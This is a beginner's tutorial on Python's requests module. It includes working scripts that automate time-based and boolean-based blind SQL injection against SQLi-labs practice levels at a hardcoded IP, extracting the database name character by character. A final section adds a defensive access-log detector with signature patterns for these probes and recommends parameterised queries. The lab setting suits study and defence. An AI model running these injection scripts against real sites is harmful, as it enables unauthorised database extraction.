Python notes: solving blind and time-based (delayed) injection with requests
The requests module
To solve this problem with Python you need to know the requests module. The PyCharm I downloaded does not ship with it, so it has to be installed:
pip install requests
Once the pip command succeeds, these are the functions the requests module offers:
| GET request | POST request |
|---|---|
| res = requests.get(url, params=data) | res = requests.post(url, data=data) |
Here res is short for response.
The call accepts many parameters inside the parentheses:
1. url
2. headers
3. params (GET request)
4. data (POST request)
5. files
6. cookies
The response object exposes, for example:
- res.text: response page content
- res.status_code: response code (e.g. 200)
- res.encoding: page encoding
- res.content: response body in binary form
- res.headers: response headers
- res.cookies: cookies returned by the server
In short, requests is a powerful module: custom header information, GET parameters, POST parameters, file upload, redirects, session tracking, cookie handling, and so on.
To get familiar with the module I used it on the SQL labs blind and time-based injection levels, doing only the step of dumping the database name. The code follows:
Solving the time-based (delayed) injection
```python
import requests
import string

url = "http://43.247.91.228:84/Less-9/"

def iftimeout(url):
    # A request that takes longer than 3 seconds means sleep(5) fired,
    # i.e. the injected condition was true
    try:
        res = requests.get(url, timeout=3)
        return res.text
    except Exception as e:
        return "timeout"

# brute-force the database name length (here it is 8)
dbnamelen = 0
while True:
    dbnamelen += 1
    dbnamelen_url = url + "?id=1'+and+if(length(database())=" + str(dbnamelen) + ",sleep(5),1)--+"
    print(dbnamelen_url)
    if "timeout" in iftimeout(dbnamelen_url):
        print("库长:", dbnamelen)
        break

# brute-force the database name, one character position at a time
dbname = ""
for i in range(1, 9):
    for j in string.ascii_lowercase:
        dbname_url = url + "?id=1'+and+if(substr(database()," + str(i) + ",1)='" + j + "',sleep(5),1)--+"
        print(dbname_url)
        if "timeout" in iftimeout(dbname_url):
            dbname += j
            print("库名:", dbname)
            break
```
This dumps the database name.
Solving the boolean-based blind injection
```python
import requests
import string

url = "http://43.247.91.228:84/Less-8/"
# page length for a true condition; a false condition returns a page of different length
htmlLen = len(requests.get(url=url + "?id=1").text)
print("the len of HTML:" + str(htmlLen))

# brute-force the database name length
dbNameLen = 0
while True:
    dbNameLen_url = url + "?id=1'+and+length(database())=" + str(dbNameLen) + "--+"
    print(dbNameLen_url)
    if len(requests.get(dbNameLen_url).text) == htmlLen:
        print("the length of dbName:" + str(dbNameLen))
        break
    if dbNameLen == 30:
        print("Error!")
        break  # stop instead of looping forever
    dbNameLen += 1

# brute-force the database name, one character position at a time
dbName = ""
for i in range(1, 9):
    for j in string.ascii_lowercase:
        dbName_url = url + "?id=1'+and+substr(database()," + str(i) + ",1)='" + j + "' --+"
        if len(requests.get(dbName_url).text) == htmlLen:
            dbName += j
            print(dbName)
            break
```
Running it dumps the database name, the same result as in the screenshot.
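From the defender's side, both scripts above leave a very recognisable trace in the web-server access log: a series of requests from one client to the same path whose `id` parameter carries `length(database())`, `substr(database(),...)` or `sleep(`. As an added example (not part of the original notes), this detector parses constructed combined-format log lines, decodes the query string and reports clients that sent a burst of such probes; the client IPs, timestamps and threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Probe signatures the enumeration loops above generate (case-insensitive)
SIGNATURES = {
    "time-based": re.compile(r"\bsleep\s*\(", re.I),
    "length-probe": re.compile(r"\blength\s*\(\s*database\s*\(\s*\)", re.I),
    "char-probe": re.compile(r"\bsubstr(?:ing)?\s*\(\s*database\s*\(", re.I),
}

# Constructed access-log lines (combined format); 10.0.0.7 / 10.0.0.9 are made-up clients
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-9/?id=1 HTTP/1.1" 200 1012
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-9/?id=1'+and+if(length(database())=1,sleep(5),1)--+ HTTP/1.1" 200 1012
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-9/?id=1'+and+if(length(database())=2,sleep(5),1)--+ HTTP/1.1" 200 1012
10.0.0.7 - - [01/Jan/2024:10:00:08 +0000] "GET /Less-8/?id=1'+and+substr(database(),1,1)='a'%20--+ HTTP/1.1" 200 1012
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /Less-8/?id=2 HTTP/1.1" 200 998
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(target):
    """Return the set of signature names found in any decoded query-string value of a request target."""
    # parse_qs turns '+' into spaces and decodes %xx, so the SQL reads as the server's driver saw it
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    hits = set()
    for values in query.values():
        for value in values:
            for name, pattern in SIGNATURES.items():
                if pattern.search(value):
                    hits.add(name)
    return hits

def analyse(log_text, burst_threshold=2):
    """Per client IP, count flagged requests and collect the signatures and paths seen.
    Only clients with at least burst_threshold flagged requests are reported: a single odd
    parameter can be noise, but the enumeration loops always produce a series."""
    per_ip = defaultdict(lambda: {"flagged": 0, "signatures": set(), "paths": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        hits = classify(m["target"])
        if hits:
            entry = per_ip[m["ip"]]
            entry["flagged"] += 1
            entry["signatures"] |= hits
            entry["paths"].add(urlsplit(m["target"]).path)
    return {ip: e for ip, e in per_ip.items() if e["flagged"] >= burst_threshold}
```

Running `analyse(SAMPLE_LOG)` reports only 10.0.0.7, with three flagged requests covering all three signatures across /Less-9/ and /Less-8/; the real mitigation is a parameterised query for `id`, the detector just tells you when someone is probing for its absence.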
To sum up
Python is a good thing, well worth studying!!!
These are my summary notes from watching a learning video; they are very basic, please don't flame me.